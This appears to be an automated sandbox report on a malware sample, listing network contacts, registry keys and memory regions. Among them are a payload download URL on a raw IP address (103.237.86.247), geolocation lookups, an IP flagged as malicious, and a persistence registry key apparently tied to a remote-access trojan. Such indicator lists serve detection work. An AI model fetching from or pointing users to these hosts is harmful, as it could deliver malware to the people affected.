https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
unknown
https://login.yahoo.com/config/login
unknown
http://geoplugin.net/json.gpW
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://103.237.86.247/NtqoCaH77.bin
103.237.86.247
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
unknown
http://103.237H
unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
unknown
http://geoplugin.net/json.gpk
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://103.237.86.247/Udmagret.h
unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://contoso.com/Icon
unknown
http://geoplugin.net/json.gpt
unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
unknown
http://103.237.86.247/Udmagre
unknown
http://103.237.86.247/Udm
unknown
http://103.237.86.2
unknown
https://github.com/Pester/Pester
unknown
http://103.237.86.247/
unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://103.237.86.24
unknown
http://103.237.86.247/Udmagret
unknown
http://103.237.86.247/Udmagret.
unknown
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
unknown
http://103.237.86.247/Udmagret.hh
unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
unknown
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
unknown
https://www.google.com/accounts/servicelogin
unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
unknown
https://aka.ms/pscore68
unknown
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
unknown
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
unknown
http://103.23
unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
unknown
http://www.ebuddy.com
unknown
There are 81 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
103.237.87.159
unknown
unknown
malicious
178.237.33.50
geoplugin.net
Netherlands
103.237.86.247
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-LO8JHK
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-LO8JHK
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-LO8JHK
time
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
663B000
heap
page read and write
malicious
9F6C000
direct allocation
page execute and read and write
malicious
5418000
trusted library allocation
page read and write
malicious
26CE6643000
trusted library allocation
page read and write
malicious
6623000
heap
page read and write
malicious
2F0F000
stack
page read and write
malicious
8060000
direct allocation
page execute and read and write
malicious
27D86D6F000
heap
page read and write
54C0000
trusted library allocation
page read and write
6740000
direct allocation
page read and write
4CD1000
heap
page read and write
3354000
heap
page read and write
4ECF000
heap
page read and write
4CEB000
heap
page read and write
2F03000
stack
page read and write
2246C000
heap
page read and write
27D86D4B000
heap
page read and write
3355000
heap
page read and write
7DF5000
trusted library allocation
page read and write
225C9000
unclassified section
page execute and read and write
26CEED86000
heap
page read and write
5D0000
heap
page read and write
224B7000
heap
page read and write
4ED9000
heap
page read and write
27D84D7C000
heap
page read and write
26B0000
trusted library allocation
page read and write
54B4000
heap
page read and write
4CD3000
heap
page read and write
4CD0000
heap
page read and write
54C0000
trusted library allocation
page read and write
4EDC000
heap
page read and write
6650000
heap
page read and write
ABE000
heap
page read and write
27D86D51000
heap
page read and write
2D6C000
stack
page read and write
225CD000
unclassified section
page execute and read and write
6D60000
trusted library allocation
page read and write
224AB000
heap
page read and write
303E000
stack
page read and write
7B8F000
heap
page read and write
27D86CC1000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
65EE000
stack
page read and write
4CCC000
heap
page read and write
27D86E10000
heap
page read and write
26CEEBF2000
heap
page read and write
4CE8000
heap
page read and write
52C0000
heap
page read and write
4EC1000
heap
page read and write
27D84DD0000
heap
page read and write
4EF9000
heap
page read and write
21780000
direct allocation
page read and write
52C1000
heap
page read and write
27D86BDC000
heap
page read and write
21BDD000
stack
page read and write
4F1A000
heap
page read and write
4CDD000
heap
page read and write
4260000
heap
page read and write
27D86CDA000
heap
page read and write
3350000
heap
page read and write
27D86CD5000
heap
page read and write
4CDD000
heap
page read and write
27D86BDC000
heap
page read and write
4CD9000
heap
page read and write
27D86D3E000
heap
page read and write
4CE3000
heap
page read and write
27D84C70000
heap
page read and write
27D86D49000
heap
page read and write
26CD4A10000
heap
page read and write
4EE8000
heap
page read and write
52C1000
heap
page read and write
4CF9000
heap
page read and write
4CD3000
heap
page read and write
27D86E11000
heap
page read and write
54B8000
heap
page read and write
11C000
stack
page read and write
34F9000
heap
page read and write
264A000
heap
page read and write
27D86D49000
heap
page read and write
4F40000
heap
page read and write
7DAB23E000
stack
page read and write
28BC000
heap
page read and write
30F4000
heap
page read and write
5299000
trusted library allocation
page read and write
7A50000
trusted library allocation
page read and write
6D90000
trusted library allocation
page read and write
27F7000
heap
page read and write
9A4000
heap
page read and write
36FB000
heap
page read and write
4EDD000
heap
page read and write
63CC000
remote allocation
page execute and read and write
C54000
heap
page read and write
26CD83FF000
trusted library allocation
page read and write
2872000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
26CEED43000
heap
page read and write
21E7C000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
3228000
heap
page read and write
27D86D33000
heap
page read and write
4ECC000
heap
page read and write
21750000
direct allocation
page read and write
1E5A7BC5000
heap
page read and write
27D86CD5000
heap
page read and write
4CCA000
heap
page read and write
7EF40000
trusted library allocation
page execute and read and write
7FFD9BA70000
trusted library allocation
page read and write
7DAABCE000
stack
page read and write
30F4000
heap
page read and write
26C0000
trusted library allocation
page read and write
221D1000
heap
page read and write
226B9000
unclassified section
page execute and read and write
27D84C90000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9B816000
trusted library allocation
page read and write
307A000
heap
page read and write
2660000
heap
page read and write
6CC0000
heap
page read and write
3354000
heap
page read and write
27D86DA8000
heap
page read and write
26E2000
trusted library allocation
page read and write
27D86CF7000
heap
page read and write
4CD4000
heap
page read and write
51C1000
heap
page read and write
2A6C000
heap
page read and write
1E0000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
3355000
heap
page read and write
80C0000
direct allocation
page read and write
709C000
stack
page read and write
4460000
remote allocation
page execute and read and write
7DAB17D000
stack
page read and write
21EFC000
stack
page read and write
4CDD000
heap
page read and write
27D84DD0000
heap
page read and write
4ECE000
heap
page read and write
27D86D66000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
27D86BD4000
heap
page read and write
3354000
heap
page read and write
26CD4A1F000
heap
page read and write
6F2E000
stack
page read and write
27D86DC1000
heap
page read and write
1E5A77C0000
heap
page read and write
27D86DAB000
heap
page read and write
26CEE5D1000
heap
page read and write
3380000
heap
page read and write
7DAAEFE000
stack
page read and write
2FB5000
heap
page read and write
3354000
heap
page read and write
27D86D8D000
heap
page read and write
2234A000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
400000
system
page execute and read and write
4CCA000
heap
page read and write
27D84D89000
heap
page read and write
97E000
stack
page read and write
307E000
heap
page read and write
67A0000
direct allocation
page read and write
27D86CF7000
heap
page read and write
59CC000
remote allocation
page execute and read and write
FD7BEFB000
stack
page read and write
4ED7000
heap
page read and write
7F5E000
stack
page read and write
7A30000
heap
page read and write
4ED7000
heap
page read and write
423E000
stack
page read and write
338D000
heap
page read and write
4ECD000
heap
page read and write
4ED9000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
26CD6510000
trusted library allocation
page read and write
9A4000
heap
page read and write
4CCC000
heap
page read and write
26CD6E3C000
trusted library allocation
page read and write
3354000
heap
page read and write
4F4A000
heap
page read and write
4EC1000
heap
page read and write
4ED1000
heap
page read and write
6A00000
heap
page read and write
26CEED94000
heap
page read and write
34FB000
heap
page read and write
224B5000
heap
page read and write
3354000
heap
page read and write
3354000
heap
page read and write
9A4000
heap
page read and write
352E000
stack
page read and write
226E0000
unclassified section
page execute and read and write
226D3000
unclassified section
page execute and read and write
7B40000
trusted library allocation
page read and write
7DAAF7D000
stack
page read and write
4ECE000
heap
page read and write
8080000
direct allocation
page read and write
27D86D2F000
heap
page read and write
36F7000
heap
page read and write
27D86D5F000
heap
page read and write
52C8000
heap
page read and write
257E000
stack
page read and write
2EFF000
stack
page read and write
6650000
heap
page read and write
4CEC000
heap
page read and write
9A4000
heap
page read and write
4EC0000
heap
page read and write
69C0000
direct allocation
page read and write
21DAE000
stack
page read and write
C54000
heap
page read and write
2E1E000
stack
page read and write
2680000
trusted library section
page read and write
26CD4A68000
heap
page read and write
4CC0000
heap
page read and write
52E3000
heap
page read and write
40BC000
stack
page read and write
22736000
unclassified section
page execute and read and write
2F80000
heap
page read and write
801E000
stack
page read and write
4190000
heap
page execute and read and write
27D84D91000
heap
page read and write
4A20000
heap
page read and write
4ED1000
heap
page read and write
27D86CF7000
heap
page read and write
3242000
heap
page read and write
4CD9000
heap
page read and write
80B0000
direct allocation
page read and write
54B8000
heap
page read and write
3355000
heap
page read and write
FD7BAFB000
stack
page read and write
27D84D7E000
heap
page read and write
356E000
stack
page read and write
26CEEAB0000
heap
page execute and read and write
4CA0000
heap
page read and write
4ECD000
heap
page read and write
26CD6400000
heap
page read and write
3310000
heap
page read and write
45D000
system
page execute and read and write
4D57000
heap
page read and write
7DAB0FE000
stack
page read and write
26CD6657000
trusted library allocation
page read and write
334C000
heap
page read and write
4ED1000
heap
page read and write
224CD000
heap
page read and write
4ED0000
heap
page read and write
27AB000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
27D84DDB000
heap
page read and write
9A4000
heap
page read and write
4ECE000
heap
page read and write
4EC0000
heap
page read and write
4EDD000
heap
page read and write
21730000
direct allocation
page read and write
26CEF040000
heap
page read and write
3354000
heap
page read and write
227B0000
heap
page read and write
26CEEC20000
heap
page read and write
27D86D2F000
heap
page read and write
34FE000
heap
page read and write
4ED3000
heap
page read and write
65E8000
heap
page read and write
4EC1000
heap
page read and write
26CD6470000
heap
page execute and read and write
4CD6000
heap
page read and write
4CD0000
heap
page read and write
4ED4000
heap
page read and write
4CDD000
heap
page read and write
7DABF8E000
stack
page read and write
4CD0000
heap
page read and write
4CCA000
heap
page read and write
4CC1000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
4ED0000
heap
page read and write
27D86D66000
heap
page read and write
6D48000
trusted library allocation
page read and write
27D86BC7000
heap
page read and write
26CEEBCA000
heap
page read and write
27D86DE5000
heap
page read and write
4C2F000
stack
page read and write
C54000
heap
page read and write
27D86D5A000
heap
page read and write
4CD9000
heap
page read and write
27D86D1D000
heap
page read and write
41F0000
heap
page read and write
4D39000
heap
page read and write
FD7B4FF000
stack
page read and write
4D40000
heap
page read and write
3355000
heap
page read and write
31A3000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
27D86CE9000
heap
page read and write
4CCC000
heap
page read and write
4CC0000
heap
page read and write
27D86CC1000
heap
page read and write
27D86CC0000
heap
page read and write
2A60000
heap
page read and write
FD7BDFF000
stack
page read and write
4CD9000
heap
page read and write
4F0E000
heap
page read and write
4CCA000
heap
page read and write
54A000
stack
page read and write
27D850A8000
heap
page read and write
27D86CE8000
heap
page read and write
34B0000
trusted library allocation
page read and write
7DAC08D000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
2F70000
heap
page read and write
27D850AA000
heap
page read and write
3220000
heap
page read and write
666C000
heap
page read and write
27D86CF7000
heap
page read and write
27D84D3A000
heap
page read and write
26CEEC00000
heap
page read and write
4EE3000
heap
page read and write
26CD6DDB000
trusted library allocation
page read and write
4CCA000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
5070000
heap
page read and write
4EEB000
heap
page read and write
26CEEDE5000
heap
page read and write
26CD808F000
trusted library allocation
page read and write
7B60000
heap
page read and write
4EC0000
heap
page read and write
26B4000
trusted library allocation
page read and write
4C38000
heap
page read and write
27D866E0000
remote allocation
page read and write
93C000
stack
page read and write
7B0F000
stack
page read and write
6EAD000
stack
page read and write
2803000
heap
page read and write
26E0000
trusted library allocation
page read and write
6E3E000
stack
page read and write
224B5000
heap
page read and write
7DAB1BE000
stack
page read and write
69EE000
stack
page read and write
2DF0000
heap
page readonly
7DAAB43000
stack
page read and write
27D86D4B000
heap
page read and write
6650000
heap
page read and write
9A4000
heap
page read and write
4CD0000
heap
page read and write
21770000
direct allocation
page read and write
27D86BDC000
heap
page read and write
4ECC000
heap
page read and write
2FA0000
heap
page readonly
4EC0000
heap
page read and write
27D86BC4000
heap
page read and write
34B0000
trusted library allocation
page read and write
3040000
heap
page read and write
2857000
heap
page read and write
26CD6C47000
trusted library allocation
page read and write
4CEB000
heap
page read and write
3354000
heap
page read and write
27D850AB000
heap
page read and write
80A0000
direct allocation
page read and write
26D0000
trusted library allocation
page read and write
3338000
heap
page read and write
26CD65D1000
trusted library allocation
page read and write
22791000
direct allocation
page execute and read and write
4ED1000
heap
page read and write
27D86CF3000
heap
page read and write
C54000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
22660000
unclassified section
page execute and read and write
26CEEDD9000
heap
page read and write
4CD1000
heap
page read and write
2FD0000
heap
page read and write
53B1000
heap
page read and write
6770000
direct allocation
page read and write
C54000
heap
page read and write
30F4000
heap
page read and write
4D47000
heap
page read and write
26CD7EC8000
trusted library allocation
page read and write
4180000
heap
page execute and read and write
2640000
heap
page read and write
400000
system
page execute and read and write
27D86CF1000
heap
page read and write
27C0000
heap
page read and write
222C2000
heap
page read and write
2780000
heap
page read and write
3330000
heap
page read and write
7DAAE7E000
stack
page read and write
4CD1000
heap
page read and write
27D86DA5000
heap
page read and write
4CC1000
heap
page read and write
6FB0000
trusted library allocation
page read and write
217A0000
direct allocation
page read and write
7A60000
trusted library allocation
page read and write
5401000
trusted library allocation
page read and write
4CD9000
heap
page read and write
7FC0000
trusted library allocation
page read and write
30F4000
heap
page read and write
30F4000
heap
page read and write
2207E000
stack
page read and write
5071000
heap
page read and write
5C0000
heap
page readonly
C54000
heap
page read and write
C0A000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
400000
system
page execute and read and write
43CA000
trusted library allocation
page read and write
45D000
system
page execute and read and write
9A4000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
220F0000
unclassified section
page execute and read and write
4CD9000
heap
page read and write
30F4000
heap
page read and write
26B3000
trusted library allocation
page execute and read and write
27D84D98000
heap
page read and write
4BE2000
trusted library allocation
page read and write
4CC8000
heap
page read and write
7FA0000
trusted library allocation
page read and write
4269000
heap
page read and write
27D86D51000
heap
page read and write
3354000
heap
page read and write
2247B000
heap
page read and write
27CE000
heap
page read and write
55070FF000
unkown
page read and write
2D10000
heap
page read and write
27D86D2F000
heap
page read and write
4CE8000
heap
page read and write
6D21000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
27A8000
trusted library allocation
page read and write
4CC1000
heap
page read and write
21760000
direct allocation
page read and write
21790000
direct allocation
page read and write
6C98000
heap
page read and write
4CC1000
heap
page read and write
30F5000
heap
page read and write
6661000
heap
page read and write
54B1000
heap
page read and write
6FC0000
trusted library allocation
page read and write
54B1000
heap
page read and write
4CD9000
heap
page read and write
26CD64A0000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page read and write
FD7B19A000
stack
page read and write
6658000
heap
page read and write
4CE9000
heap
page read and write
27D86BDB000
heap
page read and write
22570000
unclassified section
page execute and read and write
4D2C000
heap
page read and write
FD7B5FE000
stack
page read and write
4CE8000
heap
page read and write
662E000
stack
page read and write
FD7B9FC000
stack
page read and write
9A4000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
4EC1000
heap
page read and write
ABF000
heap
page read and write
665F000
heap
page read and write
4EC1000
heap
page read and write
6E60000
trusted library allocation
page read and write
224DF000
heap
page read and write
3354000
heap
page read and write
2DD0000
heap
page readonly
7D70000
trusted library allocation
page execute and read and write
222D0000
heap
page read and write
4CCE000
heap
page read and write
27D84CF7000
heap
page read and write
27D84D7C000
heap
page read and write
26CD4C35000
heap
page read and write
6661000
heap
page read and write
2F70000
heap
page read and write
1E5A79F0000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
26CD6496000
heap
page read and write
277E000
stack
page read and write
4CD7000
heap
page read and write
2D9C000
stack
page read and write
4ED9000
heap
page read and write
223C2000
heap
page read and write
4CDC000
heap
page read and write
2ECE000
stack
page read and write
956C000
direct allocation
page execute and read and write
27D84D20000
heap
page read and write
21DEE000
stack
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
2ECC000
stack
page read and write
27D86D56000
heap
page read and write
2D83000
stack
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
2EE7000
stack
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
26CEED04000
heap
page read and write
5407000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
54B1000
heap
page read and write
22760000
unclassified section
page execute and read and write
32CE000
stack
page read and write
4ED4000
heap
page read and write
4CC1000
heap
page read and write
4CD3000
heap
page read and write
221D1000
heap
page read and write
224B7000
heap
page read and write
26CD4A35000
heap
page read and write
27D86BDB000
heap
page read and write
30F4000
heap
page read and write
1E5A78FB000
heap
page read and write
27D86D77000
heap
page read and write
325F000
stack
page read and write
21F3F000
stack
page read and write
C54000
heap
page read and write
6FD0000
trusted library allocation
page read and write
27D86780000
heap
page read and write
307D000
heap
page read and write
27D86D1D000
heap
page read and write
54B1000
heap
page read and write
2BAF000
stack
page read and write
7DAB07F000
stack
page read and write
21FBF000
stack
page read and write
26CEEDEE000
heap
page read and write
26CD4A60000
heap
page read and write
3240000
heap
page read and write
53B0000
heap
page read and write
6C30000
heap
page read and write
27D86D1D000
heap
page read and write
1E5A78A0000
heap
page read and write
26CD6A44000
trusted library allocation
page read and write
7DAC18B000
stack
page read and write
263F000
stack
page read and write
27D86DA8000
heap
page read and write
2243B000
heap
page read and write
2FC8000
heap
page read and write
4D47000
heap
page read and write
27D86DC0000
heap
page read and write
27D86DA8000
heap
page read and write
27D84D7E000
heap
page read and write
2210B000
unclassified section
page execute and read and write
4EE8000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
4CCE000
heap
page read and write
2EEC000
stack
page read and write
26CE65D1000
trusted library allocation
page read and write
26CD83EC000
trusted library allocation
page read and write
4ED9000
heap
page read and write
4ED1000
heap
page read and write
26CD83E6000
trusted library allocation
page read and write
C54000
heap
page read and write
6A2E000
stack
page read and write
41B000
system
page execute and read and write
4FCC000
remote allocation
page execute and read and write
3670000
trusted library allocation
page read and write
4CD1000
heap
page read and write
3354000
heap
page read and write
366E000
stack
page read and write
7FFD9B911000
trusted library allocation
page read and write
4ED1000
heap
page read and write
27D84D7C000
heap
page read and write
27D86BC1000
heap
page read and write
2273C000
unclassified section
page execute and read and write
7B10000
heap
page read and write
54C0000
trusted library allocation
page read and write
6DDD000
trusted library allocation
page read and write
3278000
heap
page read and write
6F6E000
stack
page read and write
28B0000
heap
page read and write
5271000
trusted library allocation
page read and write
4CDD000
heap
page read and write
27D86D37000
heap
page read and write
223C3000
heap
page read and write
8A00000
direct allocation
page execute and read and write
27D86E10000
heap
page read and write
7FFD9B764000
trusted library allocation
page read and write
22790000
direct allocation
page read and write
2FDC000
heap
page read and write
6DC0000
trusted library allocation
page read and write
2277B000
unclassified section
page execute and read and write
2F80000
heap
page readonly
27D86E3F000
heap
page read and write
4CD1000
heap
page read and write
26CD4A7A000
heap
page read and write
223C3000
heap
page read and write
313E000
stack
page read and write
4D4A000
heap
page read and write
31A0000
heap
page read and write
6E50000
trusted library allocation
page read and write
7DAC10B000
stack
page read and write
316E000
stack
page read and write
666C000
heap
page read and write
2F3F000
stack
page read and write
56B0000
trusted library allocation
page read and write
54B9000
heap
page read and write
9A4000
heap
page read and write
9A4000
heap
page read and write
26CD6480000
heap
page readonly
3210000
heap
page read and write
27D850A0000
heap
page read and write
25FE000
stack
page read and write
26CD6490000
heap
page read and write
21B00000
heap
page read and write
2F30000
heap
page read and write
224B5000
heap
page read and write
30F5000
heap
page read and write
4CD9000
heap
page read and write
4EDC000
heap
page read and write
6C4E000
heap
page read and write
26CD6D08000
trusted library allocation
page read and write
4CD9000
heap
page read and write
21FFD000
stack
page read and write
21D1E000
stack
page read and write
222D1000
heap
page read and write
50C000
stack
page read and write
7FFD9B770000
trusted library allocation
page read and write
220BF000
stack
page read and write
7F1B000
stack
page read and write
9E0000
heap
page read and write
33AE000
stack
page read and write
7DAB43E000
stack
page read and write
26CE65E0000
trusted library allocation
page read and write
26CEED18000
heap
page read and write
4ED4000
heap
page read and write
4D57000
heap
page read and write
27D84D7E000
heap
page read and write
34AF000
stack
page read and write
7BA7000
heap
page read and write
4F4A000
heap
page read and write
4ED6000
heap
page read and write
26CD846E000
trusted library allocation
page read and write
51CE000
heap
page read and write
4ED9000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
30F5000
heap
page read and write
9A4000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
4CCC000
heap
page read and write
26E5000
trusted library allocation
page execute and read and write
4CCA000
heap
page read and write
227C0000
heap
page read and write
C54000
heap
page read and write
2246B000
heap
page read and write
C3E000
stack
page read and write
C54000
heap
page read and write
45C000
system
page execute and read and write
3180000
heap
page read and write
4EC8000
heap
page read and write
473000
system
page execute and read and write
30F4000
heap
page read and write
226BD000
unclassified section
page execute and read and write
7FFD9B920000
trusted library allocation
page execute and read and write
224CE000
heap
page read and write
6DD0000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
21C5D000
stack
page read and write
21C9B000
stack
page read and write
2FE2000
heap
page read and write
26CD6E20000
trusted library allocation
page read and write
2E18000
heap
page read and write
4ED1000
heap
page read and write
7ACD000
stack
page read and write
26A0000
trusted library allocation
page read and write
21740000
direct allocation
page read and write
26DA000
trusted library allocation
page execute and read and write
27D86D80000
heap
page read and write
C54000
heap
page read and write
27D86D3E000
heap
page read and write
A90000
heap
page read and write
7DAAFFF000
stack
page read and write
4A21000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
4CD8000
heap
page read and write
4EC8000
heap
page read and write
4CC0000
heap
page read and write
2DD9000
stack
page read and write
27D86CF7000
heap
page read and write
6C9D000
heap
page read and write
4ED9000
heap
page read and write
4F4A000
heap
page read and write
53BF000
heap
page read and write
7D80000
trusted library allocation
page read and write
7B99000
heap
page read and write
224CD000
heap
page read and write
54B0000
heap
page read and write
221D0000
heap
page read and write
7FFD9B762000
trusted library allocation
page read and write
4100000
trusted library allocation
page read and write
34F0000
heap
page read and write
225F0000
unclassified section
page execute and read and write
69D0000
direct allocation
page read and write
ABE000
heap
page read and write
26CD6440000
trusted library allocation
page read and write
21F7C000
stack
page read and write
9A0000
heap
page read and write
26CD6460000
trusted library allocation
page read and write
3355000
heap
page read and write
21EBD000
stack
page read and write
26CD6E58000
trusted library allocation
page read and write
9A4000
heap
page read and write
27D84DDB000
heap
page read and write
4CCD000
heap
page read and write
6FE0000
trusted library allocation
page read and write
4ED1000
heap
page read and write
27D86D77000
heap
page read and write
26CD4AA2000
heap
page read and write
3355000
heap
page read and write
AAE000
heap
page read and write
2D40000
heap
page read and write
C54000
heap
page read and write
323F000
stack
page read and write
400000
system
page execute and read and write
4CCD000
heap
page read and write
4ED8000
heap
page read and write
67B0000
direct allocation
page read and write
27D86E3F000
heap
page read and write
54B9000
heap
page read and write
6661000
heap
page read and write
22DD000
stack
page read and write
26CD6DF7000
trusted library allocation
page read and write
4EE3000
heap
page read and write
27D86BC1000
heap
page read and write
6D18000
heap
page read and write
6780000
direct allocation
page read and write
3297000
heap
page read and write
7A27000
stack
page read and write
8B6C000
direct allocation
page execute and read and write
4CD0000
heap
page read and write
26CEEAF7000
heap
page execute and read and write
7B30000
trusted library allocation
page read and write
4EEC000
heap
page read and write
FD7B7FF000
stack
page read and write
273E000
unkown
page read and write
6C80000
heap
page read and write
3170000
heap
page read and write
26CEEAF0000
heap
page execute and read and write
4EE9000
heap
page read and write
4ED0000
heap
page read and write
5B0000
heap
page read and write
4CC8000
heap
page read and write
52C8000
heap
page read and write
36F9000
heap
page read and write
4ED9000
heap
page read and write
4CCC000
heap
page read and write
27D86D36000
heap
page read and write
27D86BCF000
heap
page read and write
4EC5000
heap
page read and write
21B5E000
stack
page read and write
26CD4C10000
heap
page read and write
27D86DA7000
heap
page read and write
1E5A78C0000
heap
page read and write
27B0000
heap
page read and write
4C1F000
stack
page read and write
4CD1000
heap
page read and write
27D86D63000
heap
page read and write
4F47000
heap
page read and write
7000000
trusted library allocation
page read and write
274E000
stack
page read and write
27D86E9B000
heap
page read and write
4F57000
heap
page read and write
7040000
trusted library allocation
page read and write
2FB0000
heap
page read and write
4EC1000
heap
page read and write
4EEB000
heap
page read and write
2D7F000
stack
page read and write
25BE000
stack
page read and write
26CD6E69000
trusted library allocation
page read and write
4CC0000
heap
page read and write
26CE68CC000
trusted library allocation
page read and write
4CD3000
heap
page read and write
4CE3000
heap
page read and write
3354000
heap
page read and write
4EA0000
heap
page read and write
9F0000
heap
page readonly
26CEEB12000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
52C4000
heap
page read and write
6661000
heap
page read and write
7B50000
heap
page read and write
6CBC000
heap
page read and write
4EC0000
heap
page read and write
4EE8000
heap
page read and write
459000
system
page execute and read and write
7020000
trusted library allocation
page read and write
27D86D53000
heap
page read and write
328F000
stack
page read and write
26CEEB00000
heap
page read and write
4ED9000
heap
page read and write
56B0000
trusted library allocation
page read and write
26BD000
trusted library allocation
page execute and read and write
30F5000
heap
page read and write
4D4A000
heap
page read and write
805D000
stack
page read and write
4EDD000
heap
page read and write
41DE000
stack
page read and write
4D57000
heap
page read and write
4F57000
heap
page read and write
80D0000
trusted library allocation
page execute and read and write
1D0000
heap
page read and write
4F2C000
heap
page read and write
3354000
heap
page read and write
7010000
trusted library allocation
page read and write
4185000
heap
page execute and read and write
352F000
stack
page read and write
27D84D1F000
heap
page read and write
C54000
heap
page read and write
6DF0000
heap
page execute and read and write
4D1A000
heap
page read and write
415E000
stack
page read and write
51C1000
heap
page read and write
4CC0000
heap
page read and write
27D86BDC000
heap
page read and write
27D866E0000
remote allocation
page read and write
6DE0000
trusted library allocation
page read and write
3060000
heap
page read and write
286D000
heap
page read and write
2F33000
heap
